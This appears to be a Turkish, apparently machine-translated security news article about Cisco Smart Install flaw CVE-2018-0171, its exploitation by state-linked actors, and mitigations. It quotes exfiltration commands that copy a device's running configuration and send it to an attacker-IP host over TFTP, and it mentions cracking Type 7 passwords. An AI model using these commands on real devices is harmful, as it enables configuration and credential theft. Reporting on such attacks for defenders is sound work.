İlk olarak 2018’de yamalanan bir Cisco’nun Akıllı Kurulum Protokolü (CVE-2018-0171), devlet destekli tehdit aktörleri tarafından yaygın yanlış yapılandırmalar ve sömürü nedeniyle küresel ağ altyapısı için yaygın bir tehdit olmaya devam ediyor.
Kusur, kimlik doğrulanmamış saldırganların maruz kalan akıllı yükleme müşteri hizmetleri aracılığıyla Cisco anahtarları ve yönlendiriciler üzerinde keyfi kod yürütmesine izin vererek yapılandırma hırsızlığı, kimlik bilgisi hasat ve ürün yazılımı kurcalama sağlar.
Çin bağlantılı tuz tayfun apt grubunun son kampanyaları, kritik altyapıdaki eski güvenlik açıkları ile ilgili endişeleri yeniden canlandırdı.
.png
)
Cisco Smart Install’da Teknik Güvenlik Açıkları
Ağ aygıtlarının sıfır dokunma için tasarlanan Cisco’nun Akıllı Yükleme Protokolü, varsayılan olarak kimlik doğrulaması olmadan TCP bağlantı noktası 4786’da çalışır.
Araştırmacılara göre, bu “takma ve oynat” özelliği ilk kurulumu basitleştirir, ancak üç sistemik risk sunar: Cisco iOS/iOS XE cihazlarında varsayılan aktivasyon, yapılandırma değişiklikleri için kimlik bilgisi doğrulama eksikliği ve hizmetin sık internet maruziyeti.
Shodan ve Censys taramaları, 2025 itibariyle akıllı kurulum yoluyla halka açık 1.200’den fazla cihaz ortaya çıkıyor, ancak hepsi CVE-2018-0171’e karşı savunmasız değil.
Güvenlik açığı, akıllı kurulum yönetmen mesajlarının uygunsuz doğrulanmasından kaynaklanır ve kötü niyetli hazırlanmış paketlerin arabellek taşmalarını veya doğrudan komut yürütmesini tetiklemesine izin verir.
Saldırganlar, önemsiz dosya aktarım protokolünü (TFTP) ayarlarını manipüle etmek, çalıştırma yapılandırmalarını eklemek veya tehlikeye atılmış ürün yazılımını itmek için bundan yararlanır.
Cisco’nun Danışma Notları Kusur, Mart 2018’den önce iOS/IOS XE yazılım yayınladığı cihazları etkiliyor, ancak Geynoise gözlemleri, açılmamış sistemlere karşı devam eden sömürü girişimlerini doğrulamaktadır.
Operasyonel riskler ve sürekli sömürü
Smart Install Wasloit Araç Seti (SITV3), CVE-2018-0171’e yönelik saldırıları otomatikleştirerek tehdit aktörlerinin komutları yürütmesini sağlayarak copy running-config tftp://attacker-IP cihaz yapılandırmalarını çalmak için.
Saldırı trafiğinin adli analizi, saldırganların iki kritik komutu zincirlemesini gösterir:
copy system:running-config flash:/config.textEtkin yapılandırmayı yerelleştirmek içincopy flash:/config.text tftp://[attacker-IP]/Dosyayı şifrelenmemiş TFTP aracılığıyla dışarı atmak için
Çalınan yapılandırmalar genellikle güvenlik araştırmacılarının halka açık Vigenère şifre araçlarını kullanarak gerçek zamanlı olarak çatladığı Tip 7 şifreli şifreler içerir.
Meyveden çıkarılan kimlik bilgileri, anomali algılama sistemlerini atlayarak meşru yönetici hesapları aracılığıyla kalıcı erişim sağlar.
NSA, 2006 yılından bu yana Type 7 şifrelemesine karşı defalarca uyardı ve bunun yerine güvenli Scrypt tabanlı Tip 8/9 karmalarını savundu.
Çin’in uygun grup tuz tayfun, 2024 kampanyalarında büyük ABD telekom sağlayıcılarına karşı, ağ topolojilerini söndüren ve çekirdek altyapıya döndüren bu kusuru silahlandırdı.
Cisco Talos, 2023 yılından bu yana akıllı kurulumla ilgili tüm olayların% 17’sini bu gruba bağlar, bu da uzatılmış cihazları yanal hareket için giriş noktaları olarak kullanır.
Bir ABD Senatosu raporu, bu ihlalleri “tarihteki en kötü telekom hack” olarak adlandırdı ve kritik altyapı risklerini vurguladı.
Cisco, akıllı kurulumun devre dışı bırakılmasını önerir. no vstack 4786 bağlantı noktasını kısıtlayan komutlar ve şifreli şifre standartlarına geçiş.
Bununla birlikte, operasyonel ortamlardaki eski cihazlar genellikle yedi yaşındaki tehdidi sürdürerek bu hafifletmelerden yoksundur.
Nisan 2025 itibariyle, 300’den fazla internete bakan cihaz hala küresel olarak Sietv3 problarına yanıt vererek ağ segmentasyonu ve ürün yazılımı güncellemeleri için acil ihtiyacın altını çiziyor.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!